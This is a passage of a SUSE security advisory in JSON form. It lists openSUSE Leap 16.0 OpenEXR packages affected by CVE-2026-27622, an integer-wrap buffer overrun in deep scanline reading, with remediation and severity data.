"name": "openexr-doc-3.2.2-160000.5.1.noarch",
"product": {
"name": "openexr-doc-3.2.2-160000.5.1.noarch",
"product_id": "openexr-doc-3.2.2-160000.5.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "openexr-3.2.2-160000.5.1.ppc64le",
"product_id": "openexr-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "openexr-devel-3.2.2-160000.5.1.ppc64le",
"product_id": "openexr-devel-3.2.2-160000.5.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.s390x",
"product": {
"name": "openexr-3.2.2-160000.5.1.s390x",
"product_id": "openexr-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.2.2-160000.5.1.s390x",
"product": {
"name": "openexr-devel-3.2.2-160000.5.1.s390x",
"product_id": "openexr-devel-3.2.2-160000.5.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.x86_64",
"product": {
"name": "openexr-3.2.2-160000.5.1.x86_64",
"product_id": "openexr-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.2.2-160000.5.1.x86_64",
"product": {
"name": "openexr-devel-3.2.2-160000.5.1.x86_64",
"product_id": "openexr-devel-3.2.2-160000.5.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.aarch64"
},
"product_reference": "openexr-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "openexr-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.s390x"
},
"product_reference": "openexr-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.x86_64"
},
"product_reference": "openexr-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.2.2-160000.5.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.aarch64"
},
"product_reference": "openexr-devel-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.2.2-160000.5.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "openexr-devel-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.2.2-160000.5.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.s390x"
},
"product_reference": "openexr-devel-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.2.2-160000.5.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.x86_64"
},
"product_reference": "openexr-devel-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.2.2-160000.5.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
},
"product_reference": "openexr-doc-3.2.2-160000.5.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27622"
}
],
"notes": [
{
"category": "general",
"text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27622",
"url": "https://www.suse.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "SUSE Bug 1259177 for CVE-2026-27622",
"url": "https://bugzilla.suse.com/1259177"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
